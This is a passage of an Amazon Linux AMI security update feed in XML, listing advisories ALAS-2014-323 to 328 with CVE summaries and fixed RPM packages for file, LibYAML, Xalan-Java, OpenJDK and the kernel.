arch="i686"><filename>Packages/libcurl-7.36.0-2.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-323</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-323: medium priority package update for file</title><issued date="2014-04-10 23:55:00" /><updated date="2014-09-18 00:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix 
the following vulnerabilities:
CVE-2013-7345:
The BEGIN regular expression in the awk script detector in magic/Magdir/commands in file before 5.15 uses multiple wildcards with unlimited repetitions, which allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted ASCII file that triggers a large amount of backtracking, as demonstrated via a file with many newline characters.
1079846:
CVE-2013-7345 file: extensive backtracking in awk rule regular expression
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345" title="" id="CVE-2013-7345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-magic" version="5.11" release="13.16.amzn1" epoch="0" arch="noarch"><filename>Packages/python-magic-5.11-13.16.amzn1.noarch.rpm</filename></package><package name="file-libs" version="5.11" release="13.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.11-13.16.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.11" release="13.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.11-13.16.amzn1.x86_64.rpm</filename></package><package name="file" version="5.11" release="13.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.11-13.16.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.11" release="13.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.11-13.16.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.11" release="13.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.11-13.16.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.11" release="13.16.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.11-13.16.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.11" release="13.16.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.11-13.16.amzn1.i686.rpm</filename></package><package name="file-debuginfo" version="5.11" release="13.16.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.11-13.16.amzn1.i686.rpm</filename></package><package name="file" version="5.11" release="13.16.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.11-13.16.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.11" release="13.16.amzn1" epoch="0" 
arch="i686"><filename>Packages/file-devel-5.11-13.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-324</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-324: important priority package update for perl-YAML-LibYAML</title><issued date="2014-04-17 14:18:00" /><updated date="2014-09-18 00:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2525:
Heap-based buffer overflow in the yaml_parser_scan_uri_escapes function in LibYAML before 0.1.6 allows context-dependent attackers to execute arbitrary code via a long sequence of percent-encoded characters in a URI in a YAML file.
1078083:
CVE-2014-2525 libyaml: heap-based buffer overflow when parsing URLs
CVE-2013-6393:
The yaml_parser_scan_tag_uri function in scanner.c in LibYAML before 0.1.5 performs an incorrect cast, which allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted tags in a YAML document, which triggers a heap-based buffer overflow.
1033990:
CVE-2013-6393 libyaml: heap-based buffer overflow when parsing YAML tags
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6393" title="" id="CVE-2013-6393" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2525" title="" id="CVE-2014-2525" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-YAML-LibYAML-debuginfo" version="0.41" release="4.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-YAML-LibYAML-debuginfo-0.41-4.9.amzn1.x86_64.rpm</filename></package><package name="perl-YAML-LibYAML" version="0.41" release="4.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-YAML-LibYAML-0.41-4.9.amzn1.x86_64.rpm</filename></package><package name="perl-YAML-LibYAML-debuginfo" version="0.41" release="4.9.amzn1" epoch="0" arch="i686"><filename>Packages/perl-YAML-LibYAML-debuginfo-0.41-4.9.amzn1.i686.rpm</filename></package><package name="perl-YAML-LibYAML" version="0.41" release="4.9.amzn1" epoch="0" arch="i686"><filename>Packages/perl-YAML-LibYAML-0.41-4.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-325</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-325: important priority package update for xalan-j2</title><issued date="2014-04-17 23:50:00" /><updated date="2014-09-18 00:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0107:
It was found that the secure processing feature of Xalan-Java had insufficient restrictions defined for certain properties and features. A remote attacker able to provide Extensible Stylesheet Language Transformations (XSLT) content to be processed by an application using Xalan-Java could use this flaw to bypass the intended constraints of the secure processing feature. Depending on the components available in the classpath, this could lead to arbitrary remote code execution in the context of the application server running the application that uses Xalan-Java.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0107" title="" id="CVE-2014-0107" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0348.html" title="" id="RHSA-2014:0348" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xalan-j2-demo" version="2.7.0" release="9.9.9.amzn1" epoch="0" arch="noarch"><filename>Packages/xalan-j2-demo-2.7.0-9.9.9.amzn1.noarch.rpm</filename></package><package name="xalan-j2-javadoc" version="2.7.0" release="9.9.9.amzn1" epoch="0" arch="noarch"><filename>Packages/xalan-j2-javadoc-2.7.0-9.9.9.amzn1.noarch.rpm</filename></package><package name="xalan-j2" version="2.7.0" release="9.9.9.amzn1" epoch="0" arch="noarch"><filename>Packages/xalan-j2-2.7.0-9.9.9.amzn1.noarch.rpm</filename></package><package name="xalan-j2-manual" version="2.7.0" release="9.9.9.amzn1" epoch="0" arch="noarch"><filename>Packages/xalan-j2-manual-2.7.0-9.9.9.amzn1.noarch.rpm</filename></package><package name="xalan-j2-xsltc" version="2.7.0" release="9.9.9.amzn1" epoch="0" arch="noarch"><filename>Packages/xalan-j2-xsltc-2.7.0-9.9.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-326</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-326: important priority package update for java-1.6.0-openjdk</title><issued date="2014-04-17 23:53:00" /><updated date="2014-09-18 00:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2427:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2423:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2421:
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions.
CVE-2014-2414:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2412:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2403:
It was discovered that the JAXP component did not properly prevent access to arbitrary files when a SecurityManager was present. This flaw could cause a Java application using JAXP to leak sensitive information, or affect application availability.
CVE-2014-2398:
It was discovered that the fix for CVE-2013-5797 did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks.
CVE-2014-2397:
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions.
CVE-2014-1876:
An insecure temporary file use flaw was found in the way the unpack200 utility created log files. A local attacker could possibly use this flaw to perform a symbolic link attack and overwrite arbitrary files with the privileges of the user running unpack200.
CVE-2014-0461:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0460:
Multiple flaws were identified in the Java Naming and Directory Interface (JNDI) DNS client. These flaws could make it easier for a remote attacker to perform DNS spoofing attacks.
CVE-2014-0458:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0457:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0456:
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions.
CVE-2014-0453:
It was discovered that the Security component in OpenJDK could leak some timing information when performing PKCS#1 unpadding. This could possibly lead to the disclosure of some information that was meant to be protected by encryption.
CVE-2014-0452:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0451:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0446:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0429:
An input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when processed. A remote attacker, or an untrusted Java application or applet, could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine.
CVE-2013-5797:
It was discovered that the fix for CVE-2013-5797 did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5797" title="" id="CVE-2013-5797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0429" title="" id="CVE-2014-0429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0446" title="" id="CVE-2014-0446" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0451" title="" id="CVE-2014-0451" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0452" title="" id="CVE-2014-0452" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0453" title="" id="CVE-2014-0453" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0456" title="" id="CVE-2014-0456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0457" title="" id="CVE-2014-0457" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0458" title="" id="CVE-2014-0458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0460" title="" id="CVE-2014-0460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0461" title="" id="CVE-2014-0461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1876" title="" id="CVE-2014-1876" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2397" title="" id="CVE-2014-2397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2398" title="" id="CVE-2014-2398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2403" title="" id="CVE-2014-2403" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2412" title="" id="CVE-2014-2412" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2414" title="" id="CVE-2014-2414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2421" title="" id="CVE-2014-2421" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2423" title="" id="CVE-2014-2423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2427" title="" id="CVE-2014-2427" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0408.html" title="" id="RHSA-2014:0408" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-67.1.13.3.64.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-67.1.13.3.64.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-67.1.13.3.64.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-67.1.13.3.64.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-67.1.13.3.64.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-67.1.13.3.64.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" 
version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-67.1.13.3.64.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-67.1.13.3.64.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-67.1.13.3.64.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-67.1.13.3.64.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-67.1.13.3.64.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-67.1.13.3.64.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-327</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-327: critical priority package update for java-1.7.0-openjdk</title><issued date="2014-04-17 23:55:00" /><updated date="2014-09-18 00:23:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2427:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2423:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2421:
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions.
CVE-2014-2414:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2413:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2412:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2403:
It was discovered that the JAXP component did not properly prevent access to arbitrary files when a SecurityManager was present. This flaw could cause a Java application using JAXP to leak sensitive information, or affect application availability.
CVE-2014-2402:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2398:
It was discovered that the fix for CVE-2013-5797 did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks.
CVE-2014-2397:
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions.
CVE-2014-1876:
An insecure temporary file use flaw was found in the way the unpack200 utility created log files. A local attacker could possibly use this flaw to perform a symbolic link attack and overwrite arbitrary files with the privileges of the user running unpack200.
CVE-2014-0461:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0460:
Multiple flaws were identified in the Java Naming and Directory Interface (JNDI) DNS client. These flaws could make it easier for a remote attacker to perform DNS spoofing attacks.
CVE-2014-0459:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0458:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0457:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0456:
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions.
CVE-2014-0455:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0454:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0453:
It was discovered that the Security component in OpenJDK could leak some timing information when performing PKCS#1 unpadding. This could possibly lead to the disclosure of some information that was meant to be protected by encryption.
CVE-2014-0452:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0451:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0446:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0429:
An input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when processed. A remote attacker, or an untrusted Java application or applet, could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine.
CVE-2013-5797:
It was discovered that the fix for CVE-2013-5797 did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5797" title="" id="CVE-2013-5797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0429" title="" id="CVE-2014-0429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0446" title="" id="CVE-2014-0446" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0451" title="" id="CVE-2014-0451" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0452" title="" id="CVE-2014-0452" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0453" title="" id="CVE-2014-0453" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0454" title="" id="CVE-2014-0454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0455" title="" id="CVE-2014-0455" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0456" title="" id="CVE-2014-0456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0457" title="" id="CVE-2014-0457" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0458" title="" id="CVE-2014-0458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0459" title="" id="CVE-2014-0459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0460" title="" id="CVE-2014-0460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0461" title="" id="CVE-2014-0461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1876" title="" id="CVE-2014-1876" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2397" title="" id="CVE-2014-2397" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2398" title="" id="CVE-2014-2398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2402" title="" id="CVE-2014-2402" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2403" title="" id="CVE-2014-2403" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2412" title="" id="CVE-2014-2412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2413" title="" id="CVE-2014-2413" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2414" title="" id="CVE-2014-2414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2421" title="" id="CVE-2014-2421" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2423" title="" id="CVE-2014-2423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2427" title="" id="CVE-2014-2427" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0406.html" title="" id="RHSA-2014:0406" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.40.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.1.40.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.40.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.40.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.40.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.40.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.40.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.40.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.55-2.4.7.1.40.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.40.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.55" release="2.4.7.1.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-328</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-328: medium priority package update for kernel</title><issued date="2014-04-22 10:53:00" /><updated date="2014-09-18 00:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux 
AMI that fix the following vulnerabilities:
CVE-2014-2523:
net/netfilter/nf_conntrack_proto_dccp.c in the Linux kernel through 3.13.6 uses a DCCP header pointer incorrectly, which allows remote attackers to cause a denial of service (system crash) or possibly execute arbitrary code via a DCCP packet that triggers a call to the (1) dccp_new, (2) dccp_packet, or (3) dccp_error function.
1077343:
CVE-2014-2523 kernel: netfilter: nf_conntrack_dccp: incorrect skb_header_pointer API usages
CVE-2014-2309:
The ip6_route_add function in net/ipv6/route.c in the Linux kernel through 3.13.6 does not properly count the addition of routes, which allows remote attackers to cause a denial of service (memory consumption) via a flood of ICMPv6 Router Advertisement packets.
1074471:
CVE-2014-2309 Kernel: net: IPv6: crash due to router advertisement flooding
CVE-2014-0077:
drivers/vhost/net.c in the Linux kernel before 3.13.10, when mergeable buffers are disabled, does not properly validate packet lengths, which allows guest OS users to cause a denial of service (memory corruption and host OS crash) or possibly gain privileges on the host OS via crafted packets, related to the handle_rx and get_rx_bufs functions.
1064440:
CVE-2014-0077 kernel: vhost-net: insufficiency in handling of big packets in handle_rx()
CVE-2014-0055:
The get_rx_bufs function in drivers/vhost/net.c in the vhost-net subsystem in the Linux kernel package before 2.6.32-431.11.2 on Red Hat Enterprise Linux (RHEL) 6 does not properly handle vhost_get_vq_desc errors, which allows guest OS users to cause a denial of service (host OS crash) via unspecified vectors.
1062577:
CVE-2014-0055 kernel: vhost-net: insufficient handling of error conditions in get_rx_bufs()
